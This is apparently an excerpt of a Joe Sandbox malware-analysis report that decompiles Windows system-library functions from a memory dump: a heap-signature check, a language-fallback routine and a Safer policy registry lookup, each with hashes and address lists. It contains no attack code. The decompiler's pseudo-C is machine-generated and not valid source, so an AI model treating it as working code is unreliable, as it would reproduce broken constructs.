WindowsExcludedProcs, xrefs: 328B514A

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: cdd23fc283077d47dbfcbfecd22cb294fd12ab58a82c2524221149f3d0c3f290
Instruction ID: a6cae119a1528da9e042f2382579b1ae8b39cd0c64e1870ff547110830a67e51
Opcode Fuzzy Hash: cdd23fc283077d47dbfcbfecd22cb294fd12ab58a82c2524221149f3d0c3f290
Instruction Fuzzy Hash: 97F15FBAD02219EFDF15CF98C940ADEB7B9EF08750F50406AE915A7310EBB59E01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 32887662 Relevance: 6.3, Strings: 5, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E32887662(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E3288B910();
					} else {
						E3288B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E3288B910("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E3288B910(", passed to %s", _t29);
					}
					_push("\n");
					E3288B910();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x329847a1 = 1;
						asm("int3");
						 *0x329847a1 = 0;
					}
					return 0;
				}
				return 1;
			}

0x32887667
0x32887669
0x32887672
0x328ead93
0x328eadb2
0x328eadb7
0x328ead95
0x328eadaa
0x328eadaf
0x328eadc3
0x328eadcc
0x328eadd4
0x328eadda
0x328eaddb
0x328eade0
0x328eadf0
0x328eadf2
0x328eadf9
0x328eadfa
0x328eadfa
0x00000000
0x328eae01
0x00000000

Strings

HEAP[%wZ]: , xrefs: 328EADA5
, passed to %s, xrefs: 328EADCF
RtlFreeHeap, xrefs: 328EADCE
Invalid heap signature for heap at %p, xrefs: 328EADBE
HEAP: , xrefs: 328EADB2

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID:
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
API String ID: 0-3061284088
Opcode ID: 79deac63986ed2e8949e3144972e91fbc7dd62c4aeeb69d3e4818c67f16243f1
Instruction ID: c90eadc5d82be60054ca0b729b456e0ce24bba58bb3377eee4080e3a67bbc569
Opcode Fuzzy Hash: 79deac63986ed2e8949e3144972e91fbc7dd62c4aeeb69d3e4818c67f16243f1
Instruction Fuzzy Hash: 3801703E115140DEF305C32CD808FE677A4EB83B39F1444C9E014CB7A1DEA9A840D560

Uniqueness

Uniqueness Score: -1.00%

Function 32890485 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135
timeCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E32890485(intOrPtr* __ecx) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _t50;
				intOrPtr* _t51;
				intOrPtr* _t73;
				intOrPtr _t76;
				char _t84;
				void* _t85;
				intOrPtr _t86;
				intOrPtr* _t89;

				_t89 = __ecx;
				_t76 =  *[fs:0x30];
				_t73 =  *0x32986630; // 0x0
				_v32 = 0;
				_v28 = 0;
				_v8 = 0;
				 *((intOrPtr*)(__ecx + 4)) =  *((intOrPtr*)(_t76 + 0xa4));
				 *((intOrPtr*)(__ecx + 8)) =  *((intOrPtr*)(_t76 + 0xa8));
				 *(__ecx + 0xc) =  *(_t76 + 0xac) & 0x0000ffff;
				_v12 = _t76;
				 *((intOrPtr*)(__ecx + 0x10)) =  *((intOrPtr*)(_t76 + 0xb0));
				_t84 = 0;
				if(_t73 == 0) {
					_t73 = E328982E0(0xabababab, 0, "kLsE", 0);
					 *0x32986630 = _t73;
					if(_t73 != 0) {
						goto L1;
					}
					L4:
					_t85 = _t84 - 1;
					if(_t85 == 0) {
						 *((intOrPtr*)(_t89 + 8)) = 2;
						 *((intOrPtr*)(_t89 + 0xc)) = 0x23f0;
						L19:
						 *((intOrPtr*)(_t89 + 4)) = 6;
						L6:
						_t86 = _v12;
						_t51 =  *((intOrPtr*)(_t86 + 0x1f4));
						if(_t51 == 0 ||  *_t51 == 0) {
							L8:
							 *((short*)(_t89 + 0x14)) = 0;
							goto L9;
						} else {
							if(L328B5C3F(_t89 + 0x14, 0x100, _t51) >= 0) {
								L9:
								if( *_t89 != 0x11c) {
									if( *_t89 != 0x124) {
										L16:
										return 0;
									}
								}
								 *((short*)(_t89 + 0x114)) =  *(_t86 + 0xaf) & 0x000000ff;
								 *(_t89 + 0x116) =  *(_t86 + 0xae) & 0x000000ff;
								 *(_t89 + 0x118) = E32890670();
								if( *_t89 == 0x124) {
									 *(_t89 + 0x11c) = E32890670() & 0x0001ffff;
								}
								 *((char*)(_t89 + 0x11a)) = 0;
								if(E32890630( &_v16) != 0) {
									 *((char*)(_t89 + 0x11a)) = _v16;
								}
								E328D5050(0xff,  &_v32, L"TerminalServices-RemoteConnectionManager-AllowAppServerMode");
								_push( &_v24);
								_push("true");
								_push( &_v8);
								_push( &_v20);
								_push( &_v32);
								if(E328D3EE0() >= 0) {
									if(_v8 == 1) {
										if(_v20 != 4 || _v24 != 4) {
											goto L15;
										} else {
											goto L16;
										}
									}
									L15:
									 *(_t89 + 0x118) =  *(_t89 + 0x118) & 0x0000ffef;
									if( *_t89 == 0x124) {
										 *(_t89 + 0x11c) =  *(_t89 + 0x11c) & 0x0001ffef;
									}
								}
								goto L16;
							}
							goto L8;
						}
					}
					if(_t85 == 1) {
						 *((intOrPtr*)(_t89 + 8)) = 3;
						 *((intOrPtr*)(_t89 + 0xc)) = 0x2580;
						goto L19;
					}
					goto L6;
				}
				L1:
				if(_t73 != E32890690) {
					 *0x329891e0();
					_t50 =  *_t73();
				} else {
					_t50 = E32890690();
				}
				_t84 = _t50;
				goto L4;
			}

0x3289048f
0x32890493
0x3289049a
0x328904a0
0x328904a3
0x328904a6
0x328904af
0x328904b8
0x328904c2
0x328904cb
0x328904ce
0x328904d2
0x328904d6
0x3289060e
0x32890610
0x32890618
0x00000000
0x00000000
0x328904ef
0x328904ef
0x328904f2
0x328905e3
0x328905ea
0x328905f1
0x328905f1
0x32890501
0x32890501
0x32890504
0x3289050c
0x32890519
0x3289051b
0x00000000
0x328ee99c
0x328ee9ac
0x3289051f
0x3289052a
0x328ee9b9
0x328905cd
0x328905d3
0x328905d3
0x328ee9bf
0x3289053c
0x3289054d
0x32890559
0x32890562
0x328ee9ce
0x328ee9ce
0x3289056a
0x3289057b
0x32890580
0x32890580
0x3289058f
0x32890597
0x32890598
0x3289059d
0x328905a1
0x328905a5
0x328905ad
0x328905b3
0x328ee9dd
0x00000000
0x328ee9ed
0x00000000
0x328ee9ed
0x328ee9dd
0x328905b9
0x328905be
0x328905c7
0x328ee9f2
0x328ee9f2
0x328905c7
0x00000000
0x328905ad
0x00000000
0x328ee9b2
0x3289050c
0x328904fb
0x328ee989
0x328ee990
0x00000000
0x328ee990
0x00000000
0x328904fb
0x328904dc
0x328904e2
0x328905d6
0x328905dc
0x328904e8
0x328904e8
0x328904e8
0x328904ed
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 328905D6

Strings

kLsE, xrefs: 328905FE
TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 32890586

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID: DebugPrintTimes
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 3446177414-2547482624
Opcode ID: 3e8f491784009aa6dd21a8e8ef9354b5c14165ec9fd7ffc828d87753b7024171
Instruction ID: 9fd9367d82cd85fd52f4e2188b14f4a4781e92723389809d3bf2887aa0138744
Opcode Fuzzy Hash: 3e8f491784009aa6dd21a8e8ef9354b5c14165ec9fd7ffc828d87753b7024171
Instruction Fuzzy Hash: 345190B9A0074ADFE714DFA4C4407EAB7F4AF45304F00883ED9AAE7241EB749545CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 3289A2E0 Relevance: 5.3, Strings: 4, Instructions: 290
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E3289A2E0(signed int __ecx, signed int __edx, signed int _a4, signed int _a8, signed short* _a12) {
				char _v12;
				char* _v16;
				char _v20;
				char* _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				char _v44;
				signed int _v48;
				signed int _v52;
				void* _v56;
				signed int _v60;
				signed int _v64;
				intOrPtr _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				char _v81;
				signed int _v84;
				void* _v88;
				void* _v89;
				signed short _v92;
				char _v93;
				void* _v100;
				void* _v101;
				intOrPtr* _t122;
				signed char* _t123;
				signed char* _t125;
				intOrPtr* _t128;
				signed char* _t129;
				signed char* _t131;
				intOrPtr _t133;
				signed int _t139;
				signed short* _t159;
				intOrPtr _t163;
				signed int _t178;
				signed int _t183;

				_t122 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				_v48 = __edx;
				_v52 = __ecx;
				_v64 = 0;
				_v28 = 0x3a0038;
				_v24 = L"LdrResFallbackLangList Enter";
				_v20 = 0x380036;
				_v16 = L"LdrResFallbackLangList Exit";
				if(_t122 != 0) {
					if( *_t122 == 0) {
						goto L1;
					}
					_t123 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					L2:
					if(( *_t123 & 0x00000001) != 0) {
						if(L328A3C40() == 0) {
							_t125 = 0x7ffe0384;
						} else {
							_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						L3291FC01( &_v28,  *_t125 & 0x000000ff);
					}
					_t159 = _a12;
					if(_t159 == 0) {
						_t163 = 0xc000000d;
						_v68 = 0xc000000d;
						goto L35;
					} else {
						_t183 = 0;
						 *_t159 = 0;
						_t159[0x102] = 0;
						_v60 = 0;
						_v68 = 0;
						_v81 = 0;
						_v56 = 0;
						while(1) {
							L5:
							_v72 = 0;
							while(1) {
								L6:
								_t139 = _t183;
								_t178 = _t183;
								_t183 = _t183 + 1;
								if(_t139 > 7) {
									break;
								}
								switch( *((intOrPtr*)(_t139 * 4 +  &M3289A60C))) {
									case 0:
										__ax = _a4;
										_v64 = 1;
										goto L14;
									case 1:
										if((_a8 & 0x00000004) != 0) {
											 *((char*)(__ebx + 0x204)) = 1;
											goto L34;
										}
										if((_a4 & 0x000003ff) != 0) {
											__edx =  &_v76;
											 *((char*)(__ebx + 0x204)) = 1;
											if(E328888C8(__ecx, __edx) < 0) {
												goto L34;
											}
											__ax = _v76;
											_v72 = __ax;
											__eax = _v72;
											if(__ax != 0) {
												__esi = __edi;
											} else {
												__esi = __esi | 0xffffffff;
											}
											L30:
											_v64 = 2;
											goto L15;
										}
										__eax = 0xeeee;
										_v72 = 0xeeee;
										goto L30;
									case 2:
										_v80 = 0;
										if(E3289A630() == 0) {
											goto L24;
										}
										_t166 = _v60;
										if(_v60 >= ( *( *( *[fs:0x18] + 0xfc0) + 4) & 0x0000ffff)) {
											goto L24;
										}
										E3289A750( *( *[fs:0x18] + 0xfc0), _t166,  &_v80,  &_v81);
										_t149 = _v92 & 0x0000ffff;
										_v84 = _t149;
										if(_t149 == 0) {
											goto L24;
										}
										if(_v81 != 0) {
											if((_a8 & 0x00100000) != 0) {
												_v72 = 0xeeee;
												_t149 = _v72;
											}
										}
										_v60 = _v60 + 1;
										_t183 = _t178;
										_v64 = 3;
										goto L15;
									case 3:
										__eax = _v52;
										if(__eax == 0) {
											L24:
											_v72 = 0xeeee;
											goto L6;
										}
										__edx = _v48;
										 &_v36 =  &_v44;
										__ecx = __eax;
										__eax = E3289A1E3(__ecx, __edx,  &_v44,  &_v36, _a8);
										if(__eax >= 0) {
											 &_v12 = E328D5050(__ecx,  &_v12, _v44);
											 &_v48 =  &_v20;
											__eax = E328B56E0( &_v20,  &_v48);
											if(__al == 0) {
												_v68 = 0xc00b0005;
												goto L24;
											}
											__ax =  *((intOrPtr*)(__esp + 0x3c));
											_v72 = __eax;
											_v80 = __ax;
											if((_a8 & 0x00100000) != 0) {
												__edx =  *[fs:0x18];
												 &_v81 =  &_v80;
												__edx =  *( *[fs:0x18] + 0xfc0);
												__eax = E3289A750(__edx, 0,  &_v80,  &_v81);
												if(_v93 == 0) {
													__ax = _v80;
													_v72 = __eax;
												} else {
													__eax = 0xeeee;
													_v72 = __ax;
												}
											}
											__eax = _v36;
											__al = __al & 0x00000001;
											__al & 0x000000ff =  ~(__al & 0x000000ff);
											asm("sbb eax, eax");
											 ~(__al & 0x000000ff) & 0x00000006 = ( ~(__al & 0x000000ff) & 0x00000006) + 4;
											_v64 = ( ~(__al & 0x000000ff) & 0x00000006) + 4;
											__eax = _v72;
											goto L15;
										}
										goto L24;
									case 4:
										__eax = 0xeeee;
										_v80 = __ax;
										__eax = _a8;
										__eax =  !_a8;
										if((__eax & 0x00080000) != 0) {
											goto L34;
										}
										if( *[fs:0x18] == 0) {
											__ax = _v80;
											goto L5;
										}
										__eax =  *[fs:0x18];
										__ax =  *((intOrPtr*)(__eax + 0xc4));
										goto L14;
									case 5:
										__eax = 0xeeee;
										_v72 = __ax;
										__eax =  &_v56;
										_push( &_v56);
										_push(1);
										__eax = E328D2AE0();
										_v76 = __eax;
										if(__eax < 0) {
											goto L6;
										}
										__ax = _v56;
										goto L14;
									case 6:
										__eax = 0xeeee;
										_v72 = __ax;
										__eax =  &_v32;
										_push( &_v32);
										_push(0);
										__eax = E328D2AE0();
										_v76 = __eax;
										if(__eax < 0) {
											goto L6;
										}
										__eax = _v32;
										if(__eax == _v56) {
											goto L6;
										}
										L14:
										_v72 = __eax;
										L15:
										if(_t149 == 0xeeee) {
											goto L6;
										}
										goto L16;
									case 7:
										__eax = 0x409;
										_v72 = __ax;
										L16:
										_t179 =  *_t159 & 0x0000ffff;
										_t168 = 0;
										_t175 = _t179;
										if(_t175 == 0) {
											L20:
											if(_t179 >= 0x40) {
												goto L34;
											}
											 *((short*)(_t159 + 4 + _t175 * 8)) = _v72;
											 *(_t159 + 8 + ( *_t159 & 0x0000ffff) * 8) = _v64;
											 *_t159 =  *_t159 + 1;
											goto L6;
										} else {
											_t152 =  &(_t159[2]);
											while(1) {
												_t179 =  *_t159 & 0x0000ffff;
												if( *_t152 == _v72) {
													break;
												}
												_t168 = _t168 + 1;
												_t152 =  &(_t152[4]);
												if(_t168 < _t175) {
													continue;
												}
												goto L20;
											}
											if(_t168 < _t175) {
												goto L6;
											}
											goto L20;
										}
								}
							}
							L34:
							_t163 = _v68;
							L35:
							_t128 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
							if(_t128 != 0) {
								if( *_t128 == 0) {
									goto L36;
								}
								_t129 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								L37:
								if(( *_t129 & 0x00000001) != 0) {
									if(L328A3C40() == 0) {
										_t131 = 0x7ffe0384;
									} else {
										_t131 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
									}
									L3291FC01( &_v20,  *_t131 & 0x000000ff);
									_t133 = _v68;
								} else {
									_t133 = _t163;
								}
								return _t133;
							}
							L36:
							_t129 = 0x7ffe0385;
							goto L37;
						}
					}
				}
				L1:
				_t123 = 0x7ffe0385;
				goto L2;
			}

0x3289a2f4
0x3289a2f7
0x3289a2fb
0x3289a2ff
0x3289a307
0x3289a30f
0x3289a317
0x3289a31f
0x3289a329
0x328f29f7
0x00000000
0x00000000
0x328f2a06
0x3289a334
0x3289a337
0x328f2a17
0x328f2a29
0x328f2a19
0x328f2a22
0x328f2a22
0x328f2a35
0x328f2a35
0x3289a33d
0x3289a342
0x328f2a3f
0x328f2a44
0x00000000
0x3289a348
0x3289a34a
0x3289a34e
0x3289a351
0x3289a357
0x3289a35b
0x3289a35f
0x3289a363
0x3289a367
0x3289a367
0x3289a367
0x3289a370
0x3289a370
0x3289a370
0x3289a372
0x3289a374
0x3289a378
0x00000000
0x00000000
0x3289a37e
0x00000000
0x3289a3ff
0x3289a403
0x00000000
0x00000000
0x3289a4af
0x328f2b05
0x00000000
0x328f2b05
0x3289a4bc
0x328f2a52
0x328f2a56
0x328f2a64
0x00000000
0x00000000
0x328f2a6a
0x328f2a6f
0x328f2a77
0x328f2a7b
0x328f2a85
0x328f2a7d
0x328f2a7d
0x328f2a7d
0x3289a4cb
0x3289a4cb
0x00000000
0x3289a4cb
0x3289a4c2
0x3289a4c7
0x00000000
0x00000000
0x3289a387
0x3289a393
0x00000000
0x00000000
0x3289a39f
0x3289a3af
0x00000000
0x00000000
0x3289a3cd
0x3289a3d2
0x3289a3d7
0x3289a3de
0x00000000
0x00000000
0x3289a3e9
0x328f2a93
0x328f2a9e
0x328f2aa3
0x328f2aa3
0x328f2a93
0x3289a3ef
0x3289a3f3
0x3289a3f5
0x00000000
0x00000000
0x3289a46a
0x3289a470
0x3289a492
0x3289a497
0x00000000
0x3289a497
0x3289a475
0x3289a47e
0x3289a483
0x3289a485
0x3289a48c
0x3289a5b5
0x3289a5bf
0x3289a5c4
0x3289a5cb
0x328f2aee
0x00000000
0x328f2aee
0x3289a5d8
0x3289a5dd
0x3289a5e1
0x3289a5e6
0x328f2aac
0x328f2ab8
0x328f2abd
0x328f2ac5
0x328f2acf
0x328f2ae0
0x328f2ae5
0x328f2ad1
0x328f2ad1
0x328f2ad6
0x328f2ad6
0x328f2acf
0x3289a5ec
0x3289a5f0
0x3289a5f5
0x3289a5f7
0x3289a5fc
0x3289a5ff
0x3289a603
0x00000000
0x3289a603
0x00000000
0x00000000
0x3289a4d8
0x3289a4dd
0x3289a4e2
0x3289a4e5
0x3289a4ec
0x00000000
0x00000000
0x3289a4f6
0x328f2afb
0x00000000
0x328f2afb
0x3289a4fc
0x3289a502
0x00000000
0x00000000
0x3289a53c
0x3289a541
0x3289a546
0x3289a54a
0x3289a54b
0x3289a54d
0x3289a552
0x3289a558
0x00000000
0x00000000
0x3289a55e
0x00000000
0x00000000
0x3289a568
0x3289a56d
0x3289a572
0x3289a576
0x3289a577
0x3289a579
0x3289a57e
0x3289a584
0x00000000
0x00000000
0x3289a58a
0x3289a592
0x00000000
0x00000000
0x3289a40b
0x3289a40b
0x3289a40f
0x3289a417
0x00000000
0x00000000
0x00000000
0x00000000
0x3289a59d
0x3289a5a2
0x3289a41d
0x3289a41d
0x3289a420
0x3289a422
0x3289a426
0x3289a444
0x3289a448
0x00000000
0x00000000
0x3289a456
0x3289a45e
0x3289a462
0x00000000
0x3289a428
0x3289a428
0x3289a430
0x3289a437
0x3289a43a
0x00000000
0x00000000
0x3289a43c
0x3289a43d
0x3289a442
0x00000000
0x00000000
0x00000000
0x3289a442
0x3289a4a3
0x00000000
0x00000000
0x00000000
0x3289a4a9
0x00000000
0x3289a37e
0x3289a50e
0x3289a50e
0x3289a512
0x3289a518
0x3289a51d
0x328f2b14
0x00000000
0x00000000
0x328f2b23
0x3289a528
0x3289a52b
0x328f2b34
0x328f2b46
0x328f2b36
0x328f2b3f
0x328f2b3f
0x328f2b52
0x328f2b57
0x3289a531
0x3289a531
0x3289a531
0x3289a539
0x3289a539
0x3289a523
0x3289a523
0x00000000
0x3289a523
0x3289a367
0x3289a342
0x3289a32f
0x3289a32f
0x00000000

Strings

8, xrefs: 3289A307
6, xrefs: 3289A317
LdrResFallbackLangList Enter, xrefs: 3289A30F
LdrResFallbackLangList Exit, xrefs: 3289A31F

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID:
String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-379654539
Opcode ID: 463b60957d3b67de054c6dbe40fb4054fe40b0c26118fb43bebe087dfe19bd03
Instruction ID: 6009af890beb8d3a289b4833c461d5da875ac77dd6134f9d75cec66ca00b7fcb
Opcode Fuzzy Hash: 463b60957d3b67de054c6dbe40fb4054fe40b0c26118fb43bebe087dfe19bd03
Instruction Fuzzy Hash: B0C19B78208386DFE715CF58C480BDAB7E4FF85748F00896AF8999B250EB75C949CB52

Uniqueness

Uniqueness Score: -1.00%

Function 328C8322 Relevance: 5.3, Strings: 4, Instructions: 263
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E328C8322() {
				intOrPtr _v0;
				signed int _v8;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				char _v172;
				intOrPtr _v200;
				char _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				char* _v236;
				intOrPtr _v240;
				char _v244;
				signed short _v252;
				char _v256;
				char _v260;
				char _v264;
				char _v268;
				intOrPtr _v272;
				short _v274;
				char _v276;
				signed int _v280;
				char _v284;
				char _v288;
				char _v292;
				char _v293;
				intOrPtr _v297;
				intOrPtr _v308;
				intOrPtr _v316;
				void* __ebx;
				void* __edi;
				void* __esi;
				char _t77;
				signed int _t83;
				void* _t85;
				void* _t88;
				signed int _t94;
				signed short _t102;
				char _t113;
				void* _t127;
				char _t137;
				void* _t138;
				intOrPtr _t146;
				void* _t149;
				void* _t150;
				void* _t151;
				void* _t153;
				void* _t154;
				intOrPtr _t158;
				signed int _t160;
				void* _t163;

				_t162 = (_t160 & 0xfffffff8) - 0x124;
				_v8 =  *0x3298b370 ^ (_t160 & 0xfffffff8) - 0x00000124;
				_t137 = 0;
				_v264 = 0;
				_v280 = 0;
				_t163 =  *0x32985d70 - _t137; // 0x0
				if(_t163 != 0) {
					L18:
					_t77 = 0;
					L16:
					_pop(_t149);
					_pop(_t153);
					_pop(_t138);
					return E328D4B50(_t77, _t138, _v8 ^ _t162, _t147, _t149, _t153);
				}
				_push( &_v260);
				_push(0);
				_push(0);
				_push( *((intOrPtr*)( *[fs:0x30] + 8)));
				_t150 = 3;
				_push(_t150);
				E3289E580();
				_t154 = 2;
				_t83 =  *(_v280 + 0x5c) & 0x0000ffff;
				if(_t83 != _t150) {
					if(_t83 == _t154) {
						goto L2;
					}
					goto L18;
				}
				L2:
				_push(0x328613b0);
				_push(_t150);
				_push( &_v268);
				_t85 = E328D2AB0();
				_push("true");
				_pop(_t151);
				if(_t85 >= 0) {
					_push( &_v256);
					_push("true");
					_push( &_v92);
					_push(_t154);
					_push(0x32861a88);
					_push(_v268);
					_t88 = E328D2B00();
					_push(_v292);
					E328D2A80();
					if(_t88 < 0 || _v88 != _t151 || _v84 != _t151 || _v80 <= _t137) {
						_t154 = 2;
						goto L3;
					} else {
						L15:
						_t77 = _t137;
						goto L16;
					}
				}
				L3:
				_push(0x329833b0);
				_push(0x20019);
				_v293 = _t137;
				_push( &_v288);
				_v288 = _t137;
				if(E328D2AB0() >= 0) {
					_push( &_v284);
					_push("true");
					_push( &_v220);
					_push(_t154);
					_push(_v288);
					_t94 = E328D2AF0();
					_push(_v308);
					_t156 = _t94;
					E328D2A80();
					_t52 = _t156 + 0x7ffffffb; // 0x7ffffffb
					asm("sbb ecx, ecx");
					_t139 =  ~_t52 & _t94;
					if(( ~_t52 & _t94) < 0 || _v200 == _t137) {
						goto L4;
					} else {
						L26:
						if(L328ADDA0(_t137, _t137, 0x32861a78,  &_v264) >= 0) {
							_t158 = _v264;
							if(L328ACF00(_t139, _t147, _t158, 0x32861a90, _t137,  &_v280, _t137, _v0) < 0 || _v280 == _t137) {
								L328ACD80(_t139, _t158);
								_t137 = 0xc0000139;
							} else {
								asm("ror eax, cl");
								 *0x32985b64 =  *0x7ffe0330 ^ _v280;
								 *0x329868e4 = _t158;
							}
						} else {
							_t137 = 0xc0000135;
						}
						goto L15;
					}
				}
				L4:
				_push(0x32861398);
				_push(1);
				_push( &_v292);
				if(E328D2AB0() < 0) {
					L7:
					if(E328B3890(_t137,  &_v252) < 0) {
						goto L15;
					}
					_v276 = 0;
					_t102 = (_v252 & 0x0000ffff) + 0x78;
					if(_t102 > 0xfffe) {
						L14:
						E328A3B90( &_v252);
						if(_v297 != _t137) {
							goto L26;
						}
						goto L15;
					}
					_t146 =  *0x32985d78; // 0x0
					_t147 = _t102 & 0x0000ffff;
					_t139 = _t146 + 0x180000;
					_v274 = _t102 & 0x0000ffff;
					_t113 = L328A5D90(_t146 + 0x180000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t146 + 0x180000, _t102 & 0x0000ffff);
					_v284 = _t113;
					if(_t113 == 0) {
						goto L14;
					}
					if(E328B10D0(_t139,  &_v276,  &_v252) >= 0 && E3289FE40(_t139,  &_v276, L"\\Software\\Policies\\Microsoft\\Windows\\Safer\\CodeIdentifiers") >= 0) {
						_v244 = 0x18;
						_v236 =  &_v276;
						_push( &_v244);
						_push(1);
						_v240 = _t137;
						_push( &_v292);
						_v232 = 0x40;
						_v228 = _t137;
						_v224 = _t137;
						if(E328D2AB0() >= 0) {
							_push( &_v284);
							_push("true");
							_push( &_v172);
							_push(2);
							_push(0x32861390);
							_push(_v292);
							_t127 = E328D2B00();
							_push(_v316);
							E328D2A80();
							if(_t127 >= 0 && _v168 == _t151 && _v164 == _t151 && _v160 > 1) {
								_v293 = 1;
							}
						}
					}
					E328A3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t137, _v272);
					goto L14;
				} else {
					_push( &_v284);
					_push("true");
					_push( &_v172);
					_push(2);
					_push(0x32861390);
					_push(_v292);
					if(E328D2B00() >= 0) {
						if(_v168 == _t151 && _v164 == _t151 && _v160 > 1) {
							_v293 = 1;
							_push( &_v284);
							_push("true");
							_push( &_v172);
							_push(2);
							_push(0x32861a80);
							_push(_v292);
							E328D2B00();
						}
					}
					_push(_v292);
					E328D2A80();
					if(_v297 != _t137) {
						goto L26;
					}
					goto L7;
				}
			}

0x328c832a
0x328c8337
0x328c833f
0x328c8343
0x328c8347
0x328c834b
0x328c8351
0x328c8515
0x328c8515
0x328c84f7
0x328c84fe
0x328c84ff
0x328c8500
0x328c850b
0x328c850b
0x328c835b
0x328c8362
0x328c8363
0x328c8364
0x328c8369
0x328c836a
0x328c836b
0x328c8376
0x328c8377
0x328c837e
0x328c850f
0x00000000
0x00000000
0x00000000
0x328c850f
0x328c8384
0x328c8384
0x328c8389
0x328c838e
0x328c838f
0x328c8394
0x328c8396
0x328c8399
0x32904eee
0x32904eef
0x32904ef8
0x32904ef9
0x32904efa
0x32904eff
0x32904f03
0x32904f08
0x32904f0e
0x32904f15
0x32904f38
0x00000000
0x328c84f5
0x328c84f5
0x328c84f5
0x00000000
0x328c84f5
0x32904f15
0x328c839f
0x328c839f
0x328c83a4
0x328c83ad
0x328c83b1
0x328c83b2
0x328c83bd
0x32904f42
0x32904f43
0x32904f49
0x32904f4a
0x32904f4b
0x32904f4f
0x32904f54
0x32904f58
0x32904f5a
0x32904f5f
0x32904f67
0x32904f69
0x32904f6b
0x00000000
0x32904f7b
0x32904f7b
0x32904f8e
0x32905052
0x3290506a
0x32905093
0x32905098
0x32905072
0x32905080
0x32905082
0x32905087
0x32905087
0x32904f94
0x32904f94
0x32904f94
0x00000000
0x32904f8e
0x32904f6b
0x328c83c3
0x328c83c3
0x328c83c8
0x328c83ce
0x328c83db
0x328c8413
0x328c841f
0x00000000
0x00000000
0x328c8427
0x328c8431
0x328c8439
0x328c84e1
0x328c84e6
0x328c84ef
0x00000000
0x00000000
0x00000000
0x328c84ef
0x328c843f
0x328c8445
0x328c8448
0x328c8456
0x328c845e
0x328c8463
0x328c8469
0x00000000
0x00000000
0x328c847c
0x328c8495
0x328c849d
0x328c84a5
0x328c84a6
0x328c84ac
0x328c84b0
0x328c84b1
0x328c84b9
0x328c84bd
0x328c84c8
0x32904ff3
0x32904ff4
0x32904ffd
0x32904ffe
0x32905000
0x32905001
0x32905005
0x3290500a
0x32905010
0x32905017
0x32905045
0x32905045
0x32905017
0x328c84c8
0x328c84dc
0x00000000
0x328c83dd
0x328c83e1
0x328c83e2
0x328c83eb
0x328c83ec
0x328c83ee
0x328c83ef
0x328c83fa
